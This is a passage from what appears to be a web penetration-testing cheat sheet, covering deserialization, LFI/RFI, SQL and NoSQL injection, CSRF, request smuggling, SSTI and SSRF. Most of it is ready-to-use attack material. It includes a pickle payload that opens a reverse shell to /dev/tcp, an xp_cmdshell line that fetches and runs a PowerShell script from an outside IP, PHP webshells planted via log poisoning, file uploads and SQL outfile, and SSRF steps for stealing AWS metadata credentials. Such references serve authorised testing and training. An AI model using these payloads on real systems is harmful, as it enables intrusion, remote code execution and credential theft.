\"$payload\\n\\n\"; \njava -jar ysoserial.jar $payload \"sleep 5\" | base64 | tr -d '\\n' \u003e $payload.ser;  \necho \"-----------------Loading-----------------\\n\\n\"; done \u003c payloads.txt\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/java/gserial.sh  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/java/payloads.txt\n\n#### Signals\n-\u003e Bad Sign  \nClassNot FoundException\n\n-\u003e Good Sign  \njava.io.IOException\n  \n#### JRMPListener and JRMPClient (CommonsCollections)\n```\njava -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 80 CommonsCollections \"curl http://ip:port/shell.php -o /var/www/shell.php\"\njava -jar ysoserial-all.jar “JRMPClient” ip:80” |base64 -w0\n```\n\n### Python Deserialization\n#### Pickle\n```\nimport pickle\nimport os\nfrom base64 import b64decode,b64encode\n\nclass malicious(object):\n    def __reduce__(self):\n        return (os.system, (\"/bin/bash -c \\\"/bin/sh -i \u003e\u0026 /dev/tcp/ip/port 0\u003e\u00261\\\"\",))\n\nok = malicious()\nok_serialized = pickle.dumps(ok)\nprint(b64encode(ok_serialized))\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/python/py_pickle.py\n\n### YAML Deserialization\n  \n```\n!!python/object/apply:os.system [\"sleep 5\"]\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/yaml/exploit.yaml\n\n### nodejs Deserialization\n\nhttps://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/\n\n## XPATH Injection\n```\nerror()\n* and doc('http://hacker.site/')\n* and doc('http://hacker.site/', name(/*) ))\n```\n  \n### Tool\nhttps://xcat.readthedocs.io/en/latest/\n  \n### Wordlists for SQLI e XPath - Authentication Bypass\nhttps://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/master/Intruder/exploit/Auth_Bypass.txt  \nhttps://pastebin.com/raw/rKpsMp0g  \n\n## LDAP Web Exploitation\n### LDAP Injection - Bypass Login\n\n```$filter = \"(\u0026(uid=$username)(userPassword=$password))\";```  \n\n```\nhttps://site.com/admin.php?username=*\u0026password=*\n```  \nor  \n```\nhttps://site.com/admin.php?username=admin)(userPassword=*))%00\u0026password=blabla\n```  \n\n-\u003e Other\n\n```\nhttps://site.com/item?objectClass=*\n```  \n```\n(\u0026(sn=administrator)(password=*))\n```  \n```\n*))%00\n```  \n\n### LDAP Query\n```\nnmap -p 389,636 --script ldap-* \u003cip\u003e\n```  \nor  \n```\nldapsearch -x -H ldap://ip -D \"cn=\u003ccn\u003e,dc=\u003cdc\u003e,dc=\u003cdc\u003e\" -w \u003cpassword\u003e  -s base namingcontexts  \nldapsearch -x -H ldap://ip -D \"cn=\u003ccn\u003e,dc=\u003cdc\u003e,dc=\u003cdc\u003e\" -w \u003cpassword\u003e  -b \"dc=\u003cdc\u003e,dc=\u003cdc\u003e\n```\nhttps://github.com/dinigalab/ldapsearch\n\n### Docs\nhttps://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html  \nhttps://book.hacktricks.xyz/pentesting-web/ldap-injection\n  \n## Hash Length Extension Attack\n\n-\u003e Identify  \nhttps://site.com/index.php?file=oktest\u0026hash=hash\n\n-\u003e Exploitation  \n1-  \n```\n./hash_extender -f sha1 --data 'oktest' -s hash --append '../../../../../../../../../etc/passwd' --secret-min=10 --secret-max=40 --out-data-format=html --table \u003e payloads.out\n```\nhttps://github.com/iagox86/hash_extender  \n\n2-  \nburp intruder -\u003e payloads.out in file parameter.  \n\n## Local File Inclusion (LFI)\n### Replace ../ - Bypass\n$language = str_replace('../', '', $_GET['file']);  \n```\n/....//....//....//....//etc/passwd  \n..././..././..././..././etc/paswd  \n....\\/....\\/....\\/....\\/etc/passwd \n```\n\n### Block . and / - Bypass\n\n-\u003e urlencode and Double urlencode /etc/passwd  \n```\n%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64\n```\n```\n%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34\n```  \n### PHP Wrappers\n\n```\ndata://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D\u0026cmd=id  \nexpect://id  \nphp://filter/read=convert.base64-encode/resource=index.php  \nphp://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini\n```\n\n### Filter PHP\n-\u003e Predefined Paths  \npreg_match('/^\\.\\/okay\\/.+$/', $_GET['file'])  \n\n```\n./okay/../../../../etc/passwd\n```  \n\n### PHP Extension Bypass with Null Bytes\n```\nhttps://site.com/index.php?file=/etc/passwd%00.php\n```  \n-\u003e Removing .php  \n```\nhttps://site.com/index.php?file=index.p.phphp\n```  \n  \n#### LFI + File Upload\n-\u003e gif  \n```\necho 'GIF8\u003c?php system($_GET[\"cmd\"]); ?\u003e' \u003e ok.gif\n``` \nhttps://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/blob/main/codes/webshells/shell.gif  \n-\u003e Zip  \n1-  \n```\necho '\u003c?php system($_GET[\"cmd\"]); ?\u003e' \u003e ok.php \u0026\u0026 zip wshell_zip.jpg ok.php\n```\n2-  \n```\nhttp://ip/index.php?file=zip://./uploads/wshell_zip.jpg%23ok.php\u0026cmd=id  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/wshell_zip.jpg \n```\n\n#### Log Poisoning\n-\u003e apache\n```\nnc ip 80  \n\u003c?php system($_GET[‘cmd’]); ?\u003e  \n```  \nor  \n1-  \n```\ncurl -s http://ip/index.php -A '\u003c?php system($_GET[‘cmd’]); ?\u003e'\n```\n2-  \nhttp://ip/index.php?file=/var/log/apache2/access.log\u0026cmd=id  \n  \n-\u003e SMTP  \n```\ntelnet ip 25\nMAIL FROM: email@gmail.com\nRCPT TO: \u003c?php system($_GET[‘cmd’]); ?\u003e  \nhttp://ip/index.php?file=/var/mail/mail.log\u0026cmd=id\n```  \n  \n-\u003e SSH  \n```\nssh '\u003c?php system($_GET[\"cmd\"]);?\u003e'@ip  \nhttp://ip/index.php?file=/var/log/auth.log\u0026cmd=id\n```  \n\n-\u003e PHP session  \n```\nhttp://ip/index.php?file=\u003c?php system($_GET[\"cmd\"]);?\u003e  \nhttp://ip/index.php?file=/var/lib/php/sessions/sess_\u003cyour_session\u003e\u0026cmd=id\n```\n  \n-\u003e Other Paths  \n```\n/var/log/nginx/access.log  \n/var/log/sshd.log  \n/var/log/vsftpd.log  \n/proc/self/fd/0-50  \n```\n\n### Template LFI and directory traversal - Nuclei\nhttps://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/fuzzing/linux-lfi-fuzzing.yaml\nhttps://raw.githubusercontent.com/CharanRayudu/Custom-Nuclei-Templates/main/dir-traversal.yaml\n\n### Wordlists\n-\u003e burp-parameter-names.txt - Wordlist for parameter fuzzing  \nhttps://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt  \n\t\n-\u003e Wordlist LFI - Linux  \nhttps://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt  \n\t\n-\u003e Wordlist LFI - Windows  \nhttps://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt \n\t\n-\u003e bypass_lfi.txt  \nhttps://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/blob/main/wordlists/lfi_bypass.txt  \n\t\n-\u003e poisoning.txt  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/posoning.txt  \n\n### Tool\n```\npython3 lfimap.py -U \"http://IP/vuln.php?param=PWN\" -C \"PHPSESSID=XXXXXXXX\" -a\n```\nhttps://github.com/hansmach1ne/lfimap  \n\n## Remote File Inclusion (RFI)\n### RFI to Webshell with null byte for image extension bypass\n```\necho \"\u003c?php echo shell_exec($_GET['cmd']); ?\u003e\" \u003e evil.txt\npython -m http.server 80\n```\n```\nhttp://site.com/menu.php?file=http://\u003cIP\u003e/evil.php%00.png\n```\n\n### RFI to Webshell with txt\n```\necho '\u003c?php echo shell_exec($_GET[\"cmd\"]); ?\u003e' \u003e evil.txt\npython -m http.server 80\n```\n```\nhttp://site.com/menu.php?file=http://\u003cIP\u003e/evil.txt\u0026cmd=ipconfig\n```\n\t\n## Path Normalization\nhttps://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf\n\n## Unrestricted File Upload Bypass\n### Extension Bypass via metadata  \n1.  \n```\nmv ok.jpeg ok.jpg.php\nexiftool -Comment=\"\u003c?php $b0=$_GET[base64_decode('b2s=')];if(isset($b0)){echo base64_decode('PHByZT4=').shell_exec($b0).base64_decode('PC9wcmU+');}die();?\u003e\" ok.jpg.php\n```\n2.  \nhttps://site.com/upload/ok.jpg.php?ok=whoami\n\n## SQL Injection (SQLI)\n### SQL Injection - MySQL/MariaDB\n-\u003e Bypass Authentication  \n```\n' or 1=1 -- -\nadmin' -- -\n' or 1=1 order by 2 -- -\n' or 1=1 order by 1 desc -- - \n' or 1=1 limit 1,1 -- -\n```\n-\u003e get number columns\n```\n-1 order by 3;#\n```\n\t\n-\u003e get version\n```\n-1 union select 1,2,version();#\n```\n\t\n-\u003e get database name\n```\n-1 union select 1,2,database();#\n```\n\t\n-\u003e get table name\n```\n-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=\"\u003cdatabase_name\u003e\";#\n```\n\t\n-\u003e get column name\n``` \n-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema=\"\u003cdatabase_name\u003e\" and table_name=\"\u003ctable_name\u003e\";#\n```\n\t\n-\u003e dump\n```\n-1 union select 1,2, group_concat(\u003ccolumn_names\u003e) from \u003cdatabase_name\u003e.\u003ctable_name\u003e;#\n```\n\n#### Webshell via SQLI - MySQL\n-\u003e view web server path  \n```\nLOAD_FILE('/etc/httpd/conf/httpd.conf')    \n```\n-\u003e creating webshell\n```\nselect \"\u003c?php system($_GET['cmd']);?\u003e\" into outfile \"/var/www/html/shell.php\";\n```\n\n#### Reading Files via SQLI - MySQL\ne.g  \n```\nSELECT LOAD_FILE('/etc/passwd')\n```\n\t\n### WAF and Filter Bypass\n#### Query default:\n```\n'UNION SELECT 1,name,3,4 from users; -- -\n```\n\n#### UNHEX - hexadecimal\n```\n```\n\n#### Add comment /* */ for space bypass\n```\n'UNION/**/SELECT/**/1,name,3,4/**/from/**/users; -- -\n```\n\n#### Add comment /*! */ in query for filters bypass\n```\n'/*!UNION SELECT*/ 1,group_concat(name),3,4 from users; -- -\n```\n\n#### Add random case\n```\n`'UnIoN SeLeCt 1,GrOuP_cOnCaT(nAme),3,4 FrOm users; -- -\n```\n\n#### Example of mix:\n```\n'/*!UnIoN/**/SeLeCt/**/1,GroUp_ConCat(nAmE),3,4/**/FrOm/**/users; -- -\n```\n\n#### Other Techniques:\n-\u003e urlencode;  \n-\u003e Scientifc Notation;  \n-\u003e hexadecimal, substr, etc...  \n\n### MSSQL Injection\n\n-\u003e Bypass Authentication\n```\n' or 1=1--\n```\n\n-\u003e Enable xp_cmdshell\n```\n' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--\n```\n\n-\u003e RCE\n```\n' exec xp_cmdshell \"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.147/InvokePowerShellTcp.ps1')\" ;--\n```\nhttps://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1\n\n### Oracle SQL\n-\u003e Bypass Authentication\n```\n' or 1=1--\n```\n\t\n-\u003e get number columns\n```\n' order by 3--\n```\n\t\n-\u003e get table name\n```\n' union select null,table_name,null from all_tables--\n```\n\t\n-\u003e get column name\n```\n' union select null,column_name,null from all_tab_columns where table_name='\u003ctable_name\u003e'--\n```\n\t\n-\u003e dump\n```\n' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--\n```\n\t\n### Scripts Example\n-\u003e Second-Order SQL Injection (query connector)  - Example (edit)  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/sqli/second-order/script.php\n\t\n-\u003e Time Based SQL Injection Script - Example (edit)  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/sqli/time-based/sqli.py\n\n### Out-Of-Band SQL Injection\n```\nselect load_file(concat('\\\\\\\\',version(),'.hacker.site\\\\a.txt'));\n```\n  \n### SQLMAP Tamper's\n-\u003e randomcase.py  \nhttps://raw.githubusercontent.com/sqlmapproject/sqlmap/master/tamper/randomcase.py  \n-\u003e ord2ascii.py  \nhttps://raw.githubusercontent.com/sqlmapproject/sqlmap/master/tamper/ord2ascii.py  \n-\u003e xforwardedfor.py  \nhttps://raw.githubusercontent.com/sqlmapproject/sqlmap/master/tamper/xforwardedfor.py  \n-\u003e second-order.py - Example (edit)  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/sqli/tampers/second-order.py  \n\n### CSRF Token Bypass - SQLMAP\n```\nsqlmap --csrf-url=http://site.com/user-profile --csrf-token=\"\u003ctoken\u003e\" -r request.txt -p'\u003cparameters\u003e' --random-agent -D \u003cdatabase\u003e -T \u003ctable\u003e --dump\n```\n\n### SQLite Injection\n-\u003e extracting table names, not displaying standard sqlite tables\n```\nhttp://site.com/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--\n```\n-\u003e extracting table users  \n```\nhttp://site.com/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--\n```\n\n-\u003e Reference  \nhttps://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf  \n\n### XPATH Notation\ne.g.  \n```\n%' and extractvalue(0x0a,concat(0x0a,(select database() limit 1))) -- -\n``` \n\n### Wordlist for SQL Injection - Bypass  \nhttps://gist.githubusercontent.com/zetc0de/f4146eb278805946ab064a753eac6a02/raw/e126452093b9cde7f82eff14a15f8ceca8188701/sqli-bypass-waf.txt\n\n### Doc for SQL Injection - Bypass  \nhttps://github.com/OWASP/www-community/blob/master/pages/attacks/SQL_Injection_Bypassing_WAF.md\n\n### Templates - Nuclei\nhttps://raw.githubusercontent.com/geeknik/the-nuclei-templates/main/error-based-sql-injection.yaml\nhttps://raw.githubusercontent.com/panch0r3d/nuclei-templates/master/header_sqli.yaml\nhttps://raw.githubusercontent.com/ghsec/ghsec-jaeles-signatures/master/time-sqli.yaml\n\n## NoSQL Injection (NoSQLI)\n-\u003e Auth bypass\n```\nusername=test\u0026password=test  \nusername=admin\u0026password[$ne]=abc  \nusername=admin\u0026password[$regex]=^.{6}$  \nusername=admin\u0026password[$regex]=^a.....\n{\"username\": {\"$regex\": \"admin\"}, \"password\": {\"$ne\": \"\"} }\n{\"username\": {\"$eq\": \"admin\"}, \"password\": {\"$ne\": \"\"} }\n{\"username\": {\"$ne\": \"\"}, \"password\": {\"$ne\": \"\"} }\n```\n-\u003e regex\nhttps://quickref.me/regex\nhttps://regex101.com/\n\n## Cross-Site Request Forgery (CSRF)\n### Tricks\n- The session must only contain Cookies or HTTP Basic Authentication header, no other headers must be used to handle the session like a JWT for example.  \n- Cross-Origin Resource Sharing (CORS) - Is used for sharing resources from different origins and allowing servers to specify who can access their assets and which HTTP request methods are allowed from external resources. You must take into account the CORS policy of the victim's website, if GET and POST requests are made from a form and you do not need to read the response the CORS policy will not prevent the attack. However, through other methods such as PUT and DELETE, for example, it will not be possible to make requests using HTML forms;  \n- If the session cookie has the samesite flag, it will not be possible to send it through the attack;  \n- Analysis also other mechanisms that can prevent/difficult your attack like referer, captcha, csrf tokens in parameters or in header.  \nhttps://rodolfomarianocy.medium.com/metodologia-para-explora%C3%A7%C3%A3o-de-csrf-750f333da4fc\t\n\t\ne.g.  \n-\u003e csrf.html  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/csrf/csrf.html\n  \n-\u003e csrf_json.html  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/csrf/csrf_json.html\n  \n-\u003e csrf_json_xhr.html  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/csrf/csrf_json_xhr.html\n\n### Bypass Token CSRF - Example\n-\u003e csrf_token_bypass.html  \n```\u003cscript type=\"text/javascript\"\u003e\n\nfunction addUser(token)\n{\n\n\tvar url=\"https://site.com/add_user.php\";\n\tvar params=\"name=Admin\u0026surname=ok\u0026email=ok@gmail.com\u0026role=admin\u0026submit=CSRFToken=\" + token;\n\n\tvar CSRF = new XMLHttpRequest();\n\tCSRF.open(\"POST\", url, true);\n\tCSRF.withCredentials = 'true';\n\tCSRF.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n\n\tCSRF.send(params);\n\n}\n\n//Token Extraction\nvar XHR = new XMLHttpRequest();\nXHR.onreadystatechange = function(){\n\n\tif(XHR.readyState == 4){\n\t\tvar htmlSource = XHR.responseText;\n\t\t\n\t\t//Extract the token\n\t\tvar parser = new DOMParser().parseFromString(htmlSource, \"text/html\");\n\t\tvar token = parser.getElementById('CSRFToken').value;\n\n\t\taddUser(token);\n\t}\n}\n\nXHR.open('GET', 'http://site.com/add_user.php', true);\nXHR.send();\n\t\n\u003c/script\u003e\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/csrf/csrf_token_bypass.html\n\n### Analyze the token and perform brute-force\n\n1-  \n`burp intruder -\u003e sequencer -\u003e Token Location Within Response -\u003e Start live capture -\u003e save tokens`\n\n2-  \n`cat tokens.txt | uniq -c | nl`  \n\n## ClickJacking\n```\n\u003ciframe src=\"https://example.com\"\u003e\n```\n-\u003e Scan your site now - check for headers  \nhttps://securityheaders.com/\n\n## Host Header Injection\n```\nheadi -url http://site.com/admin.php\n```\nhttps://github.com/mlcsec/headi\n\n## HTTP Request Smuggling\n### CL.TE - Content-Length X Transfer-Encoding\nCL.TE: The frontend uses the Content-Length header and the backend server uses the Transfer-Encoding header  \ne.g.  \n```\nPOST / HTTP/1.1\nHost: site.com\nContent-Length: 11\nTransfer-Encoding: chunked\n\t\n0\n\nATTACK\n```\n1. Front-End use Content-Length of 11;  \n2. back-end divides into 2 blocks to process.  \nFirst block: 0  \nSecond block: Attack that will be processed in another request  \n\t\n### TE.CL - Transfer-Encoding X Content-Length\nTE.CL: The frontend uses the Transfer-Encoding header and the backend server uses the Content-Length header  \ne.g.  \n```\nPOST / HTTP/1.1\nHost: site.com\nContent-Length: 3\nTransfer-Encoding: chunked\n\n6\nATTACK\n0\n```\n1. Front-End use Transfer-Encoding of 6 bytes and processes the request in two blocks:  \nFirst block: Attack  \nsecond block 0  \nAnd that request is forwarded to the backend server.  \n2. Back-End use and process Content-Length header of 3 bytes, and the remainder starting with ATTACK are not processed and the backend server will handle it on the next request.  \n\t\n### TE.TE - Transfer-Encoding X Transfer-Encoding\nThe frontend and backend support Transfer-Encoding, but it is possible to induce a non-processing on one of the servers through the obfuscating of the header.\ne.g.  \n```\nTransfer-Encoding: xchunked\nTransfer-Encoding : chunked\nTransfer-Encoding:[tab]chunked\nTransfer-Encoding: x\n[space]Transfer-Encoding: chunked\nTransfer-Encoding[space]: chunked\nX: X[\\n]Transfer-Encoding: chunked\nTransfer-Encoding\n: chunked\n```\n\t\n### Tool\t\n```\npython3 smuggler.py -u \u003cURL\u003e\n```\nhttps://github.com/defparam/smuggler\n\n-\u003e Study  \nhttps://portswigger.net/web-security/request-smuggling  \n\n## Open Redirect\n### Use of \"@\", to redirect to an address after the \"@\"\n```\nsite.com@evil.com\n```\n\n### Parameter Pollution\n```\n?url=website_whitelist.com\u0026url=site.com\n```\n\n### Open Redirect to XSS\ne.g.  \n```\njavascript:alert(1)\n\";alert(0);//\n```\n\n### Nuclei Template\nhttps://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/vulnerabilities/generic/open-redirect.yaml\n\t\n## Server-Side Template Injection (SSTI)\n### Identify\n-\u003e Jinja2 or Twig  \n```\n{{3*3}}\n```\n\n-\u003e Smarty or Mako  \n```\n{3*3}\n```\n\n-\u003e ERB(Ruby)  \n```\n\u003c%= 7*7 %\u003e\n```\n\n-\u003e FreeMarker  \n```\n#{3*3}\n```\n\n-\u003e Other  \n    \n```\n${3*3}\n${{3*3}}\n3*3\n```\n\n### Java Expression Language\n```\n{{T(java.lang.Runtime).getRuntime().exec('id')}}\n''.class.forName('java.lang.Runtime').getRuntime().exec('id')\n```\n\n### FreeMarker\n-\u003e Remote Code Execution  \n```\n\u003c#assign ex = \"freemarker.template.utility.Execute\"?new()\u003e${ ex(\"id\")}\n```\n\n### Python - Secret Key\n  \n```\n{{settings.SECRET_KEY}}\n```\n  \n### Doc for SSTI\t\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection\n  \n## Server-Side Request Forgery (SSRF)\n### Bypass in Filters\n-\u003e Host obfuscation (hex, octa, integer)  \ne.g.  \n```\nhttp://0177.0.0.1  \nhttp://0x7F.0.0.1 \nhttp://2130706433\n```   \n\n-\u003e Rare address  \ne.g.  \n```\nhttp://0/  \nhttp://127.1\nhttp://127.1.1  \nhttp://127.127.127.127  \nhttp://127.2.2.2  \nhttp://127.2.0.2\n```  \n\n-\u003e URL encoding  \ne.g.  \n`http://%31%32%37%2e%30%2e%30%2e%31`\n\n-\u003e Enclosed alphanumerics  \n```\nhttp://⑯⑨。②⑤④。⑯⑨｡②⑤④\nhttp://①②⑦。①\n```\n-\u003e Bash variables  \ne.g.  \n`http://evil.$site.com`\n\n-\u003e Bypass of whitelist  \ne.g.  \n`http://site.com@127.0.0.1`\n\n-\u003e Domain redirection  \ne.g.  \n`http://localtest.me`\n\n-\u003e Using [::]  \ne.g.  \n`http://[::]`\n\n### Wordlist for localhost bypass\n```\n0o177.0.0.1\n%30%6f%31%37%37%2e%30%2e%30%2e%31\nhttp://%30%6f%31%37%37%2e%30%2e%30%2e%31\nhttp://①②⑦。①\n①②⑦。①\n%60%61%66%02%60\n%68%74%74%70%3a%2f%2f%60%61%66%02%60\nhttp://0o177.0.0.1\nq177.0.0.1\n%71%31%37%37%2e%30%2e%30%2e%31\nhttp://%71%31%37%37%2e%30%2e%30%2e%31\nhttp://q177.0.0.1\no177.0.0.1\n%6f%31%37%37%2e%30%2e%30%2e%31\nhttp://%6f%31%37%37%2e%30%2e%30%2e%31\nhttp://o177.0.0.1\n0177.0.0.1\n%30%31%37%37%2e%30%2e%30%2e%31\nhttp://%30%31%37%37%2e%30%2e%30%2e%31\nhttp://0177.0.0.1\n2130706433\n%32%31%33%30%37%30%36%34%33%33\nhttp://%32%31%33%30%37%30%36%34%33%33\nhttp://2130706433\n127.0.0.0\n%31%32%37%2e%30%2e%30%2e%30\nhttp://%31%32%37%2e%30%2e%30%2e%30\nhttp://127.0.0.0\n127.0.1.3\n%31%32%37%2e%30%2e%31%2e%33\nhttp://%31%32%37%2e%30%2e%31%2e%33\nhttp://127.0.1.3\n127.127.127.127\n%31%32%37%2e%31%32%37%2e%31%32%37%2e%31%32%37\nhttp://%31%32%37%2e%31%32%37%2e%31%32%37%2e%31%32%37\nhttp://127.127.127.127\n[::]\nhttp://[::]\n0\n%30\nhttp://%30\nhttp://0\n127.1\n%31%32%37%2e%31\nhttp://%31%32%37%2e%31\n%31%32%37%2e%30%2e%31\nhttp://127.1\n127.0.1\n%31%32%37%2e%30%2e%31\nhttp://%31%32%37%2e%30%2e%31\nhttp://127.0.1\n127.1.1.1\n%31%32%37%2e%31%2e%31%2e%31\nhttp://%31%32%37%2e%31%2e%31%2e%31\nhttp://127.1.1.1\n0x7f000001\n%30%78%37%66%30%30%30%30%30%31\nhttp://%30%78%37%66%30%30%30%30%30%31\nhttp://0x7f000001\n017700000001\n%30%31%37%37%30%30%30%30%30%30%30%31\nhttp://%30%31%37%37%30%30%30%30%30%30%30%31\nhttp://017700000001\n0177.00.00.01\n%30%31%37%37%2e%30%30%2e%30%30%2e%30%31\nhttp://%30%31%37%37%2e%30%30%2e%30%30%2e%30%31\nhttp://0177.00.00.01\n127.0.0.1.nip.io\n%31%32%37%2e%30%2e%30%2e%31%2e%6e%69%70%2e%69%6f\nhttp://%31%32%37%2e%30%2e%30%2e%31%2e%6e%69%70%2e%69%6f\nhttp://127.0.0.1.nip.io\nlocaltest.me\nhttp://%6c%6f%63%61%6c%74%65%73%74%2e%6d%65\n%6c%6f%63%61%6c%74%65%73%74%2e%6d%65\nhttp://localtest.me\nhttp://127.1.1.1:80\\@127.2.2.2:80/\nhttp://127.1.1.1:80\\@@127.2.2.2:80/\nhttp://127.1.1.1:80:\\@@127.2.2.2:80/\nhttp://127.1.1.1:80#\\@127.2.2.2:80/\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/ssrf_local_bypass.txt\n\n### SSRF for metadata theft from AWS\n\n-\u003e target\n```\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/\u003ciam-role\u003e\nhttp://169.254.169.254/latest/api/token \n```\n\n-\u003e Export credentials\n```\nexport AWS_ACCESS_KEY_ID=\u003caccess_key_id\u003e   \nexport AWS_SECRET_ACCESS_KEY=\u003csecret_access_key\u003e  \nexport AWS_SESSION_TOKEN=\u003csession_token\u003e  \n```\n-\u003e Test obtaining the configured identity information\n```\naws sts get-caller-identity\n```\n-\u003e Performing enumeration and exploration in the cloud environment\n```\nIn construction\n```\n\n### Wordlist ssrf_meta_bypass\n```\n169.254.169.254.nip.io\nhttp://169.254.169.254.nip.io\n%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34%2e%6e%69%70%2e%69%6f\nhttp://%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34%2e%6e%69%70%2e%69%6f\n169.254.169.254\nhttp://169.254.169.254\n%68%74%74%70%3a%2f%2f%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34\nhttp://%68%74%74%70%3a%2f%2f%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34\n0251.0376.0251.0376\t\nhttp://0251.0376.0251.0376\n%30%32%35%31%2e%30%33%37%36%2e%30%32%35%31%2e%30%33%37%36\nhttp://%30%32%35%31%2e%30%33%37%36%2e%30%32%35%31%2e%30%33%37%36\n0xA9FEA9FE\nhttp://0xA9FEA9FE\n%30%78%41%39%46%45%41%39%46%45\nhttp://%30%78%41%39%46%45%41%39%46%45\n2852039166\nhttp://2852039166\n%32%38%35%32%30%33%39%31%36%36\nhttp://%32%38%35%32%30%33%39%31%36%36\n⑯⑨。②⑤④。⑯⑨｡②⑤④\nhttp://⑯⑨。②⑤④。⑯⑨｡②⑤④\n%6f%68%02%61%64%63%02%6f%68%61%61%64%63%2f\nhttp://%6f%68%02%61%64%63%02%6f%68%61%61%64%63%2f\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/ssrf_meta_bypass.txt  \n\n### SSRF - Protocol Smuggling\n\n-\u003e HTTP-Based(Elastic, CouchDB, Mongodb, docker),etc.  \n-\u003e Text-Based(ftp(21), smtp(587), zabbix(10051), mysql(3306), redis(6379), memcached(11211), etc.  \n\n-\u003e gopher  \n`gopher://127.0.0.1:port/_`\n\n#### Scripts\n-\u003e edit memcached.py  \n```\nstats items  \nstats cachedump \u003cslab class\u003e \u003cnumber of items to dump\u003e  \nget \u003citem\u003e\n``` \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/ssrf_protocol_smuggling/memcached.py \n\n-\u003e zabbix.py  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/ssrf_protocol_smuggling/zabbix.py\n\n### Tool's\n-\u003e Gopherus  \nhttps://github.com/tarunkant/Gopherus\n  \n#### Docs for SSRF\nhttps://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf  \nhttps://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery\n\n## Null Origin Exploitation\n-\u003e Identify - Response\n```\nHTTP/1.1 200 OK  \n...  \nAccess-Control-Allow-Origin: null  \nAccess-Control-Allow-Credentials: true\n```\n\n### Common\n-\u003e nullorigin.html  \n```\n\u003chtml\u003e\u003chead\u003e\n\u003cscript\u003e\nvar xhr = new XMLHttpRequest();\nxhr.onreadystatechange = function() {\n\tif (xhr.readyState == XMLHttpRequest.DONE) {\n\tvar r = xhr.responseText;\n\talert(r)\n\t}\n}\nxhr.open('GET', 'http://site.com/admin.php', true);\nxhr.withCredentials = true;\nxhr.send(null);\n\u003c/script\u003e\n\u003c/head\u003e\u003c/html\u003e\n\n``` \n\n### Null Origin Exploitation Exfiltrate via url per server\n-\u003e nullorigin2.html\n```\n\u003chtml\u003e\u003chead\u003e\n\u003cscript\u003e\nvar xhr = new 